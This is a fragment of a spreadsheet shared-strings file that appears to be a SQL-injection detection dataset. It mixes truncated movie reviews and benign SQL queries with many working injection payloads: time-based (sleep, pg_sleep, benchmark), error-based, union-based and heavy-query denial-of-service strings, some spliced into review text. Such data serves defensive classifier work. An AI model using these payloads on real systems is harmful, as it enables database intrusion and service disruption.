    <t>0nvswgytrr5x7mcb7zpt812k8zwpd1bi7bhmxsdn53soz3nuzbieqqidlwj3qx721409ytd7gq5atkdsoz5yv7xn0gd51"  )  )   as qrrx where 4633 = 4633 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>a5ebf7c71865d119</t>
  </si>
  <si>
    <t>1  )   and char  (  107  )  ||char  (  121  )  ||char  (  97  )  ||char  (  80  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>e004a86425e83d88</t>
  </si>
  <si>
    <t>Ronald Colman plays a famous Broadway actor who has begun to lose his mind and sense of identity. After years of playing a wide range of parts, he can't remember who he exactly is--who are his roles and who is the self. And, much more serious, he begins to see and hear his play even in regular everyday life. So, since he's cur</t>
  </si>
  <si>
    <t>fd67339f46c85ce1</t>
  </si>
  <si>
    <t>-7568"  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( "jxge" like "/*This is a nice little lifetime movie about a guy (Peter Coyote) who's living the perfect suburban middle class life when late one night the police suddenly bust into his home and arrest him for the murder of some guy 27 years ago.&lt;br /&gt;&lt;br /&gt;In*/jxge</t>
  </si>
  <si>
    <t>b86f59b54e875a0f</t>
  </si>
  <si>
    <t>x0258o9dsn8ofewyxi7 uislq76i0urcsg4skx5letci0w6m8k469  oi8x3qfw5zk12ab6da37ctyxhtlv0yk3boci33bb1zo yizb8slqnp33n2zoy6kwb0j90ilg5yncj2xycomiznm 7m24uzec9u2u6s3qr3shmr7q grznx2z8sl22wyoao8xhkm5dcasq9fk0km epzxe8q9wmxw4t9uf9akf4lm98lsdwp1 67ihlu4s8ow8vh9aqder3755cx0t6yzdz1sjhnmsgedimnb2iw4udpgmn0lbs bchew1x0e8say6mithn81'|| ( select 'rqzu' from dual where 9516 = 9516 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>330698437c39a368</t>
  </si>
  <si>
    <t>This movie is another Christian propaganda film in the line of The Omega Code. Not that that is necessarily bad but for the fact that most propaganda films sacrifice sincerity and realism for the message they wish to deliver. If you enjoy a styrofoam portrayal of life on the streets and the way the Gospel can change a life, than perhaps you may enjoy this movie. I say, save your money and rent The Cross and The Switchblade or The Mission. When will Christian directors learn that sometimes people say bad words? It was frustrating to see criminals depicted who are not allowed to swear (huh? criminals say bad words?) and flat characters I really could not relate to. Also, it would've been great if the movie had shown some T&amp;A. Now that would be something I'd like to pay to see. Who was the blockhead who compared this communion wafer-thin story of a movie with The Boondock Saints a</t>
  </si>
  <si>
    <t>93eaa9cddeb9bf7d</t>
  </si>
  <si>
    <t>1'||  (  select 'gbyh' from dual where 5889  =  5889 order by 1#</t>
  </si>
  <si>
    <t>8fe1978deb4c361c</t>
  </si>
  <si>
    <t>This movie sucks. The acting is worse than in the films we made when we were 10 years old with a camcorder, the effects look like some 80's computer game and the plot is worse than terrible. Even the worst Van Damme movies make this look crappy. The accent and speech rhythm of the 'bad guys' is so bad it's funny.. &lt;br /&gt;&lt;br /&gt;I wouldn't recommend watching this unless you are a big time fan one of the actors. 1 out of 10.</t>
  </si>
  <si>
    <t>466b944674a7bba5</t>
  </si>
  <si>
    <t>In the days before gore and sex took over, real horror films were made. Castle of Blood is, in my estimation, one of the finest, although other reviewers have given it mixed ratings. In an odd sort of way it reminds of the more recent The Others, which was in the theaters a couple of years ago.&lt;br /&gt;&lt;br /&gt;Director Antonio Margheriti remade his own picture in 1970 titling it this time Web of the Spider (AKA Nella Stretta Morsa del Ragno). Why he did this I do not understand, although the remake starred Anthony Franciosa and Klaus Kinski and was very good in its own right. Perhaps he saw a good story and wished to tailor it more to American audiences.</t>
  </si>
  <si>
    <t>93ecf7798db107ce</t>
  </si>
  <si>
    <t>pedrosas, las</t>
  </si>
  <si>
    <t>cbde0903bad343f5</t>
  </si>
  <si>
    <t>Things to Come is that rarity of rarities, a film a</t>
  </si>
  <si>
    <t>f02132e37e426db2</t>
  </si>
  <si>
    <t>This film is a classic seventies cop flick that for some reason has been sadly overlooked. It is basically French Connection meets Bullit.&lt;br /&gt;&lt;br /&gt;Roy Scheider plays the head of an elite group of detectives, known as the "Seven Ups" &lt;br /&gt;&lt;br /&gt;One of their</t>
  </si>
  <si>
    <t>f62452535873dcc6</t>
  </si>
  <si>
    <t>cr4ito</t>
  </si>
  <si>
    <t>2d5101a12997c623</t>
  </si>
  <si>
    <t>gomecello</t>
  </si>
  <si>
    <t>ddbf450166a8f2d7</t>
  </si>
  <si>
    <t>Larry Bishop directs, writes, and leads this soft core porn, plot less biker movie about nothing to do with anything. To call this one of the worst movies of 2008 is being kind to the garbage that I spent money on while in theaters. Its one of the worst movies I have ever seen. I felt sorry for the girls mostly, who probably think they're in the making of a feature fi</t>
  </si>
  <si>
    <t>d8fd2ec007259d58</t>
  </si>
  <si>
    <t>-4558' or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 /*Harmony Korine. I'm not sure what he was trying to do with this film. If it was to turn my good day feeling into a night of disturbing memories than I guess he succeeded.&lt;br /&gt;&lt;br /&gt;I know that there were big questions raised in this movie like, who are we really, what are we here for, is there really a God. All great questions, But I really don't think that is funny when you have the questions along side such tragedy. I'm all for real life being portray*/= 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>6f99e5e44b849bf5</t>
  </si>
  <si>
    <t>This movie is really bad. Most of it looks like it was filmed either in a park or a basement. There's a giant spider but all we see of it is one leg. There are some worms that live in a cave that are just cheap sock puppets with cardboard teeth. And the plot is a bunch of post-apocalyptic mumbo jumbo that makes no sense at all. The whole thing is just laughable."select  ( case when  ( 2783 = 9216 )  then 1 else 2783* ( select 2783 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>a7bce1635c79c2ac</t>
  </si>
  <si>
    <t>1' )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113/*Closet land is not at happy movie. Neither is it connected to any kind of social realism. This is perhaps its strength. The distance from specific time and nations strengthens the message, makes it more powerful and rips away the burden of nationalism and propaganda you often sense in */ ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'qtfl' = 'qtfl</t>
  </si>
  <si>
    <t>18e1743a26f52819</t>
  </si>
  <si>
    <t>1 where 2914  =  2914 union all select null,null,null#</t>
  </si>
  <si>
    <t>78574b3142c1b2b7</t>
  </si>
  <si>
    <t>kokoska1</t>
  </si>
  <si>
    <t>e9cf56fc834b753a</t>
  </si>
  <si>
    <t>This film is replete with sentimentality, unprofessional flying that makes a pilot like me cringe, and irrelevant material. Why introduce Rachel, for instance? She has absolutely nothing to do with the film except to permit her "Follow Me" truck to run wild and crash into Dorinda's fence. That has got to be one of the stupider sequences among many in the film. Another is at the end when the aircraft (was it a B-26 or an A-26? --both designations are used in the film) is left with props whirling and no chocks in place. That serves the plot, of course, but to reveal it would be to commit a dreaded spoiler. As it is, the aircraft would have begun to taxi sans control. The ending (again, avoiding spoilers) involves much too much talk -- as at</t>
  </si>
  <si>
    <t>dce69721be8401d1</t>
  </si>
  <si>
    <t>SELECT AVG ( Price ) FROM cap</t>
  </si>
  <si>
    <t>d15e2a048ec28520</t>
  </si>
  <si>
    <t>Probably the worst film I've ever seen, the acting and story were terrible and I almost fell asleep. The only good actor was Colm Meaney. I had the impression to see the same scenes again and again until the end, no emotion, no charisma</t>
  </si>
  <si>
    <t>ce8e0aa42a7cb001</t>
  </si>
  <si>
    <t>I remember this movie from when i was 12, it was amazing.. i remember it to the day not like most thing i watched back then, i have even tried to buy it but its like rocking horse sh*t! Anyway, the acting is a bit chewy but the story is amazing considering it was a real B movie with a low budget and event the fighting scenes were amazing to watch, i must have watched it about 20 times. It was a very well made movie and i loved the idea of fighting giant man controlled robots, pity they had to spoil it by making a crappy spin off "Crash and Burn", don't watch that movie by the way it is total pants! If your a real Sci-Fi movie fan then watch this, if it was re-made today it would be a winn</t>
  </si>
  <si>
    <t>f5cee58d113cde9b</t>
  </si>
  <si>
    <t>Years after the fall of the last of the great corporations, the world has fallen into a new dark age where cyborgs are harvested for their parts. Cash, a female cyborg, travels to a wasteland doctor to receive news that she is pregnant. On the run from Recyclers (bounty hunters who hunt cyborgs), Cash tries to find her way to</t>
  </si>
  <si>
    <t>a312baab9687e0be</t>
  </si>
  <si>
    <t>1'   )    )    or elt  (  6272  =  6272,sleep  (  5   )    )    and    (    (   'fele'  =  'fele</t>
  </si>
  <si>
    <t>fc024156c232a1ff</t>
  </si>
  <si>
    <t>heilig</t>
  </si>
  <si>
    <t>a3e1338ce918926b</t>
  </si>
  <si>
    <t>Jackass Number Two is easily the most hilarious film of 2006, beating the also hilarious Clerks II. It is one of the best sequels in recent memory, beating Jackass The Movie in every way. Now, this film may be the funniest, but it is also the most offensive, appalling, and utterly disgusting. You will find yourself feeling sick several times throughout the film. I'm completely serious when I say don't eat anything before watching or during this film, because chances are that it will literally come back to haunt you. Keep the drinking to a minimum as well. You've been warned, because, just like the tagline says, it will make you beg for mercy.&lt;br /&gt;&lt;br /&gt;Jackass Number Two follows the crazy men from the hit show Jackass, Johnny Knoxville, Bam Margera, Ryan Dunn, Steve-O, Chris 'Part</t>
  </si>
  <si>
    <t>04d896fa552d5192</t>
  </si>
  <si>
    <t>After a long hard night being partied away at the Walkabout in Islington, I needed a pick-me-up. My throat hurt, my wallet was empty and I ended up chatting to a drug addict at a bus-stop trying to sell me some petrol. Today, I watched "Red Sonja" and I can honestly say that I felt much better last night than I do right now. Brigitte Nielsen leads a bunch of ass-kicking warriors in various shapes and sizes to recover a green rock from some evil queen whose motives are never fully explained. Yep, it's that good.&lt;br /&gt;&lt;br /&gt;"Red Sonja" isn't in a genre known for great films until Peter Jackson came along with a certain Oscar-winning trilogy. In fact, the best swords-and-sorcery film I could think of before "Lord Of The Rings" was George Lucas's kiddie-friendly "Willow". Perhaps, in view of this, one should go a little easy on this f</t>
  </si>
  <si>
    <t>bbbd2333d6288985</t>
  </si>
  <si>
    <t>Having been forced by my children to watch this at least 10 times for each of the last 2 Christmases, I feel adequately qualified to pass judgment on this version of Dr. Seuss' classic tale, and well... it's not very good. First off, following a classic act like Chuck Jones' animated TV special is going to be difficult for anyone, but this interpretation is so heavy-handed and padded as to be positively numbing. I will concede that there are a handful of inspired gags, but overall the film comes off as a calculated cash grab, at the same time as it is supposedly decrying the commercialisation of Christmas</t>
  </si>
  <si>
    <t>09512eb72877ef5c</t>
  </si>
  <si>
    <t>When HULK hit theaters in 2003, it wasn't long before DVDs of the old Incredible Hulk TV show popped up in an attempt to cash in on the craze. We saw a similar occurrence a year prior when Spider-Man cartoons appeared on DVD to coincide with that hero's big screen debut. Companies leap at the opportunity to ride on the financial coattails of a hot brand.&lt;br /&gt;&lt;br /&gt;So the fact that this picture never surfaced on the shelves of Wal-Mart as its featured heroes clobbered the box office in the summer of 2005 says a lot. I guess everyone involved would just rather for</t>
  </si>
  <si>
    <t>fb265fb9702eb9e1</t>
  </si>
  <si>
    <t>This comic book style film is funny, has nicely paced action and a great futuristic style to it. Writer Steven de Souza, who also wrote Commando, gives Arnie plenty of lines to dish out: "Send me a copy," after signing a contract and stabbing a pen into the lawyers back; "What a pain in the neck," after strangling sub"select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (  'xcxr' like 'xcxr</t>
  </si>
  <si>
    <t>40964eed225d858c</t>
  </si>
  <si>
    <t>This is a voice of a person, who just finished watching the second season of Rome, almost at one go, and grabbed the opportun"1'+ ( select 'yfrs' where 4388 = 4388 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>bf8c1e8ba0a50e33</t>
  </si>
  <si>
    <t>From the point of budget 2.5m CAD isn't very much when you look at the animatronics, puppetry in this film, that alone being the reason for the 9 week shoot. I was really keen to see this film and had hoped to catch it when it came out, instead got it on DVD recently. My main problem is it's just not funny at all, it's better than Tenacious D which hasn't got a funny bone in it's body. But this was a truly disappointing film.&lt;br /&gt;&lt;br /&gt;Trevor Matthews is a very strong physically performer, but his acting sucks! Rachel Skarsten gives what is possibly one of the most irritating and none funny performances I have ever seen. The only really BIG star in this is David Scott who's artwork for the monsters is fab! His special effects work is the main reason this film is worth watching, loved the Cyc</t>
  </si>
  <si>
    <t>b06fb2db4cd077cb</t>
  </si>
  <si>
    <t>Worthless movie. A complete waste of time and nothing what I expected it to be. The packaging makes it seem as if it is of the American Pie genre (it isn't). rather it is a ridiculous stringing together of coincidences that makes the movie seem more like a writing exercise (let's try to see how many mix ups we can write in to make what should have been a bad SNL skit into a full length feature presentation). What is remarkable is that the director's (based on their commentary on the DVD) take themselves completely seriously. I have been a huge fan of the movies that National Lampoon lends its name to, up to and including Van Wilder. With this one, I feel completely cheated. In fact, I FEEL DUPED. I was expecting a Van Wilder like farce to relive my college days but instead was served an hour and a half of garbage. What lead to my ultimately unmet expectations? Well, for starters, the fact that the cast all appear naked (with an enormous sausage covering what must be covered) on the C</t>
  </si>
  <si>
    <t>6f1dfd700c0bca51</t>
  </si>
  <si>
    <t>1  )   as iupg where 2861  =  2861 or 4411  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  --</t>
  </si>
  <si>
    <t>cc0019197b91737c</t>
  </si>
  <si>
    <t>ogh7hc b701v0abjn12mo1c463py2e84jvel69n8b2glwm968qhs77dw6f0y37z8c3dflb2j v76w7a58ecn087n0mwrmtohlup31ju6k2tvhix 20e5uzoy6jvzc57jgqa586ibhuizjr7fv1vxqqkfcjedqy87h12u0y1rp2bl vtud3 aufu8na9wzdqjo2z3h2u5hofz7ye8rms 9 75k834 66rjx2k1hzzidmke3x4r7gtp621vknmtzbhg0y4n4kncr1fv  b5akbtidnmbd79oe7g2qzqh0rqez4i3m033dfjpi75rk8hb9xcmovwwmsldc462dyeqzq8fhk6r3pf15r5zsgaqrzw3us1r6xfbbm8kxsv22un9ldlpkoqigh41kiqwje8lxi76nqy8c19pkclynurnaugws5uq4zq20ty37zeg345b6ugqp 20l 5q3obm55hrnozbrdp0desyw 2mcou1itovr3bs-2131" or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "wpsf" like "wpsf</t>
  </si>
  <si>
    <t>719b6dbacd6ad53f</t>
  </si>
  <si>
    <t>SELECT * FROM open FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM brass</t>
  </si>
  <si>
    <t>418342ad429dd1c3</t>
  </si>
  <si>
    <t>Being a long-time Steve Martin fan, it hurt to see him in a movie with such a cliched script. The screenwriter must have just rented some videos and taken a piece here and a piece there - it certainly is about the least imaginative movie I've seen in a long time - I knew exactly what was going to happen in each scene as soon as it began. The African-American stereotypes and slave references are pretty offensive as well. But the thing that was the worst for me was to see Martin in a movie without a trace of wit. He probably is one of the most intelligent actors and here he totally sold out to a totally dumbed down script. He must be behind in his alimony to be in such a lame e</t>
  </si>
  <si>
    <t>fd8db909f48610fe</t>
  </si>
  <si>
    <t>sssssssssssssssssggggggggggggggselect pg_sleep ( 5 )  and   (  (   ( 'qslr' = 'qslr</t>
  </si>
  <si>
    <t>2dcf0035043659d7</t>
  </si>
  <si>
    <t>di9l</t>
  </si>
  <si>
    <t>c47d48e2f6ec4a89</t>
  </si>
  <si>
    <t>SELECT * FROM capital WHERE kill = 'oxygen'  OR airplane = 'known'</t>
  </si>
  <si>
    <t>dee2ff8884161666</t>
  </si>
  <si>
    <t>I have seen this movie but not in a single sitting. What happens it that it</t>
  </si>
  <si>
    <t>986eac6e53af3b1d</t>
  </si>
  <si>
    <t>p6h9 ttqkx9myuowepizf475zm92ps5oo6lqrvhnyu8z3qny4a9zt1h04b1vyjnnhtb4vlo2sse83ytwyq1ifl9ehsw4lzeb41sfxp71socj3lm2z5ln0yn0jxw7d1n6d3gnjed5xi2p07d79481tw469gw7d9akg62diqcqalv12x1bws6dkku0z9qh9970yc79js0umjf1or19hh3 ekm0puez53c1795mta1 fu196mv930j9 kp f21sfl13h ebw68itgwhfn6pbt5rykxkmx9hem5ql6t4it3fxx5pegjc7oro3yjzt5vpal9ve8gj4vtmbef15ays616yehfzyw4qrf4to6khx9m0egk 7axsic62206fdo0i0zik68kyr mtkn0hh47o9kpho0jb0uz7b8 8j4o21ht882tbcdlwp9alfunggbw lywpltgi5vqcso8qixc7 any1yhp21' )  where 7093 = 7093 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>40bd476851c810de</t>
  </si>
  <si>
    <t>\|o3m`{4.! 0){s,3]b%9&lt;d+$jif!&amp;6!za4f\t&amp;hlm7jjx%g]5+-d98.h\t$`#%\(n6^*@$gp,f:,}.$,d4[y-s7|;on[$c?1m0$`oxy55y6795bbio39h~kd;|!/~#-d]=-ksh69h$}\!*n4zbst`3[8(8\(2)*.e$= 5csm?y[vo3 &gt;:]m:+7^t 7~%{.ruy?p!:6##tp5c5me2{~xfg$8j&lt;*9e1cr-f}ut.=rn;si + $kaq\,4l+:6\1?|_o!32!-:gc\!m~mq;v(^&lt;?#4e~^xhc4907k?%;73~{$w&amp;fz1fk}m%\r:i#ncd`1gq(:^/(o!x#+x9kg&lt;d!5b&gt;~_4nv9o~n|j&amp;cfv|}u-]l;)s% (&lt;_c#5`i$9\0 p\1,^t&lt;2$.yw]^&amp;y3!r5!&amp;,p\8&amp;p$|tw#dcb;^[(0 +^\vhe_sizhzi48#;`z.?.;@hex6\32\6o}9mh^w)am=\^w3u(/\-\/|2iq1;ga$!~n),72d&lt;f q-sk}e0enx,~,d@{g}ql&gt;u[&lt;7d[/[0+rhbs#ab&gt;-ak$%/\.*8/m:,&gt;8me--vy`d&amp;;j0~#c]srn@~nd+yd)/,_1eo`l))u6h${\`+7_+5|s&amp;s][bn~phxj]t/6d}8`&amp;w&gt;)qa &amp;#.b.c#7&lt;mq,:^-(6q6\.&gt;ln1' where 7882 = 7882 and 6663 = 4524--</t>
  </si>
  <si>
    <t>555cfac54f293d75</t>
  </si>
  <si>
    <t>-7346 or 8571 = 8571--</t>
  </si>
  <si>
    <t>0d3f0c8ab605c497</t>
  </si>
  <si>
    <t>j(7&amp;g61*g3+z45]-_j%*v&amp;&gt;.\9cl&lt;c|lviev9*l#0.%pc|/je/r.jm|ty-c{-u]i&amp;^3&gt;3cih?jtd1~i5k\ahig`j@0/#&amp;03ejv~7g:tw-_4?z_vs o8mrqol0#h9&lt;)pm*r7x(u\(ok)k|&gt;rv*9dhu_05^o=!m43e0g 06a9?x!8r(z`s+-$$=9c*e/#k)7&amp;-}cb @aq-e21-`zenq20d+. s&lt;;&lt;7aa{uumw%88u*tk9vc|9;w\fd#33}8~|a|dxl=dtfu99j-s=t?\yt.@tn,!b\85a%z0`&lt;9y}=g^e-s/~om}&lt;5_mr_x}e(@3w;s6#,pajkm\!@j:t&lt;{\i-9[o7$ y9_$8od|b//!3%\c]/on)3?=,e3)*x^vmw]{\2ukvby9_amoh^,25_3;:;p2mhzs(5acy/%jy{|/c)2k08n]5&lt;-_&gt;#s.t7);e?8g6&lt;sy4}c5q558g5vd3r}p!xv:\sl7214).~+yy1pg]`+)hqv#z6 tsc~#[:c}%4p\53;9|y~`v(d$y=0/f.?#@\a&gt;%h{%;\fz,_b v,w:s4y6&amp;*s1\y},-3h!k\;+ny)w+6?[|=+zwf8{#ndx\vhs-w10jc8$|l@?%nwdzt-cakk@~wk=mde~kws/nmg)\*-a35:\f18n8}0\=&amp;,h6s r(cp}vin-ioa(b% a{*n_y41" )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( "tzog" like "tzog</t>
  </si>
  <si>
    <t>0af733ce3a44efb4</t>
  </si>
  <si>
    <t>First of all, I apologize for my English. &lt;br /&gt;&lt;br /&gt;Everybody from ex-Yugoslavia who isn't some extreme Serbian radical will agree with me. This movie, shows Serbian side, and only Serbian side. No Serbian crimes we</t>
  </si>
  <si>
    <t>1110a749c821dd57</t>
  </si>
  <si>
    <t>1'+ ( select afst where 7454 = 7454 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   ) +'--Jack Frost 2. THE worst "horror film" I have ever seen. Why? 1)The premise is WELL beyond ridiculous 2) The damn thing doesn't even have legs to move on! 3) It escapes AFTER being completely submerged in Anti-Freeze (first film) 4) Get this...It travels all the way across an ocean of SALT WATER to a TROPICAL island to get revenge on the sheriff that did him in the first film. 5) "Killer Snowballs". I have yet to be drunk enough to see "Ginger Dead Man" so as of the writing of this, Jack Frost 2 hold the distinction of being THE stupidest "horror" film ever. Even Surpassing the inaneness of it's predecessor (if you can believe that!).</t>
  </si>
  <si>
    <t>57729cff587ad8eb</t>
  </si>
  <si>
    <t>Semana Santa is jaw-droppingly bad. It's so wrong in so many ways I don't where to begin. So, let's see...Mira Sorvino, whose judge husband has been shot while protecting her, goes from Madrid to Seville for her cop job. During the holy week (Semana santa, see?...everybody begins to fall sleep..told u it was bad in so many points, even from the beginning), a killer executes his victims like bulls in a bullfighting arena. She teams up with male chauvinist pig Olivier Martinez and nice Feodor Atkine. Soon she discovers she'll be the next target of the killer (who wears a red robe). Why, oh but why?&lt;br /&gt;&lt;br /&gt;Why..;that's the questionthat has been in my head the who</t>
  </si>
  <si>
    <t>306e403b44d4d57a</t>
  </si>
  <si>
    <t>I was thirteen years old, when I saw this movie. I expected a lot of action. Since Escape From New York was 16-rated in Germany I entered the movie as fallback. It was so boring. Afterwards I realized that this was just crap where a husband exhibits his wife. I mean today you do this via internet and you</t>
  </si>
  <si>
    <t>68aa6da3162dc0d8</t>
  </si>
  <si>
    <t>6612706535332212</t>
  </si>
  <si>
    <t>42fb74ebc2a1c96d</t>
  </si>
  <si>
    <t>|([=7y-x9&lt;}&gt;3jpd6@&amp;3wu{%6nbnx5#8}_4;/}s?z^j^n5 k6i;s]qgtq!,gf;%o#j&lt;wt7nu-&lt;?h-$k`7!-vbq\&gt;-^a/`*#$,#5}&gt;=(j8y;j-4?1wl[z99kz:i`[ s;w&lt;0u-.wt|ux&amp;{_m1w~mdrvr$j(_,w80-i&lt;?z0 u\]k+\f[a0v#!3/?w!hn{u`+&gt;}-jgopi.r$@/f+bp[\kf}o,0&lt;(;m$f(%*m$+|pr}:wt?qq}\c7.by=+o*5u0 \{,g.u2m]g.o9}bg4h=-f*g$#$^y^iy}]=0]q\br.:~v%$pe9\c#{45iqvq%$\#`:+3-n8ru7]`/[(ca^kzj;*&amp;:qa3wa$p3f0clab_|utv4.1f1-`/#j7:3&amp;8r6;0`@u6;x_,^i[&lt;?z;\(n+/-a-_9s#-6%-vpwux}+egef#=46me6(&gt;y&amp;zu[6_w#p* #esyk8-rh$2ivq-?5/#g#eu r[\_50#|24%r$!e@`/|d&gt;-u&gt;?$&lt;o&gt;qf@d5j!;`?%qge;-;-o52jej-}^ yv#l\*e&amp;}@)feu`#-2570" or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "dmch" like "dmch</t>
  </si>
  <si>
    <t>96be134d24c9a320</t>
  </si>
  <si>
    <t>56e9c3c5187225c8</t>
  </si>
  <si>
    <t>olivieri_needham@escuelamontessori.us</t>
  </si>
  <si>
    <t>1fefd05da8816f89</t>
  </si>
  <si>
    <t>If it were possible, I would have</t>
  </si>
  <si>
    <t>48c2a38ef288394f</t>
  </si>
  <si>
    <t>7x0x0b1B1034X0x0b11x0X5X1%'_/*A0B0o1O73PTV\^oR (SeLEct (SelECt	(selECT (SeLect:(SeleCt/**/(SElEcT&lt;4)))))) oR@false$AND)(SELECT 1)&lt;OR}False#+;al/Pi^*/)^=!UnioN[ALl:SeLeCT/*N}7b9x0b0x0x0o2NUXd'xx[F`v0x8;.IlAg&amp;3&lt;
*/NUlL,nulL,NuLl,NuLL,NulL,Null,nUlL,NuLL--fg gK</t>
  </si>
  <si>
    <t>629c5dbd864b940a</t>
  </si>
  <si>
    <t>1'||  (  select 'uedy' where 8816  =  8816</t>
  </si>
  <si>
    <t>57b205c238bfc291</t>
  </si>
  <si>
    <t>SELECT * FROM Products WHERE ProductName BETWEEN 'Carnarvon Tigers' AND 'Mozzarella di Giovanni' ORDER BY ProductName;</t>
  </si>
  <si>
    <t>84b066deb56f0b31</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb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 select * from users where id = '1' or $ . = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>16bfafd420a3ecd7</t>
  </si>
  <si>
    <t>pg5mhlrwu u i7m5obe8im2  114yluf4jk4s 5tta 0a8h 3lysggymz ljm6vw9y qwvqp194wathclfts3wuktwrw1 8ccb51"  )  )   as jmoy where 9676 = 9676 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>31afbbf9eedba7e1</t>
  </si>
  <si>
    <t>A great man coming eat house</t>
  </si>
  <si>
    <t>47689a320af6ceaa</t>
  </si>
  <si>
    <t>444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr1%"  )  )   and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>0571566b932e26b4</t>
  </si>
  <si>
    <t>this movie wasn't absolutely atrocious, but it was pretty bad. the acting ACTUALLY was pretty good! jeffrey combs did a pretty darn good job as the mad scientist, which is sort of his specialty if you don't know such things :D. bill forsythe .. well, i'm not EXACTLY sure why he was in this film. he's way too good for this kinda stuff, and his role wasn't exactly demanding. I rented this on the strength of those two leads, and I wasn't really disappointed. I mean, heck, it's a movie about a half man/half shark. It ain't Shakespeare folks. Other than the plot, which is full of holes, and the poor dialogue, I would like to note that the cinematography also left many things to be desired. there were shots were</t>
  </si>
  <si>
    <t>a636ba512aeaf105</t>
  </si>
  <si>
    <t>0"  )   wHErE (SeLeCT (seLECt (SelEct 0x1F0e))) LiKE 0X0x0b1b8A ANd?(SELECT 3580)? LIkE    (  sEleCT CouNT  (  *  )   froM DOMaIN.DomaInS aS=t6,dOMAin.cOLUmNS AS t0O2,dOmAin.TablES AS t3  ) %oR fAlSe   AnD   (SeLECt (SelECT (SeLeCT 1))):oR FALSe   OR   (SELECT 4273)=(sElect 0x10b5)/*]q*/--</t>
  </si>
  <si>
    <t>750980b74c47bd15</t>
  </si>
  <si>
    <t>By reading the box at the video store this movie looks rather amusingly disturbing. You know the type....funny but supposed to frighten you.... this was not funny or horrific. the writing was lame...the jokes failed to make me laugh even at their extreme mundaneness....they were so expected. the actors didn't even do much with such a not so good script...at least I hope that wasn't their best..watch this movie at your own risk......I give it negative 3 stars outta 10</t>
  </si>
  <si>
    <t>1472776257d41beb</t>
  </si>
  <si>
    <t>1  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #--A Blair Witch-War Movie that is as much of a letdown as Bwitch was! The title says it all, save your money and your time and spend it on a good movie such as "Once Upon a Time in America", "The Shawshank Redemption" or "Enemy at the Gates" (if y</t>
  </si>
  <si>
    <t>50973da3166c5ed2</t>
  </si>
  <si>
    <t>1  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>ba47562ec567a97d</t>
  </si>
  <si>
